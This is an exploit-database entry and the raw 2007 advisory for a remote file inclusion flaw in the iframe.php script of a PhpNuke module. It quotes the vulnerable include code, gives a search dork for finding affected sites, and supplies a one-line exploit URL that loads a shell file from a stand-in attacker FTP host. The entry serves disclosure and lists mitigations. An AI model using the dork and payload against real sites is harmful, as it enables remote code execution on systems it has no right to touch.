iFRAME for PhpNuke (iframe.php) Remote File Include Vulnerabilities

vendor:

PhpNuke

by:

Cold z3ro

N/A

CVSS

HIGH

Remote File Include

CWE

Product Name: PhpNuke

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

iFRAME for PhpNuke (iframe.php) Remote File Include Vulnerabilities

The iFRAME for PhpNuke (iframe.php) script is vulnerable to remote file inclusion. An attacker can include remote files by manipulating the 'file' parameter in the URL. This can lead to remote code execution and compromise of the affected system. The vulnerability exists in the iframe.php script.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update from the vendor. Additionally, ensure that the 'file' parameter is properly validated and sanitized before including it in any file inclusion operation.

Source

Exploit-DB raw data:

######################################################
#
# iFRAME for PhpNuke (iframe.php) Remote File Include Vulnerabilities
#
######################################################
#
# script :http://www.desarrollonuke.org
#         http://up.9q9q.net/up/index.php?f=uTRRQnIjG
#
######################################################
#
# file :  iframe.php
#
######################################################
#
# Dork : "/nuke/iframe.php"
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com ,
http://hack-teach.com/
#
######################################################
#       if(substr($file,-4)!=".htm" && substr($file,-5)!=".html" &&
substr($file,-4)!=".php"){
#                       echo "ERROR: ONLY html, htm or php FILES";
#                       CloseTable();
#               } else {
#               include ($file);
#               }
#
######################################################
#
# exploit :
http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm
#
######################################################


----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf
KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| |
020 | | abdulla00 " alz3eem" | | The_Viper |
             All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-18]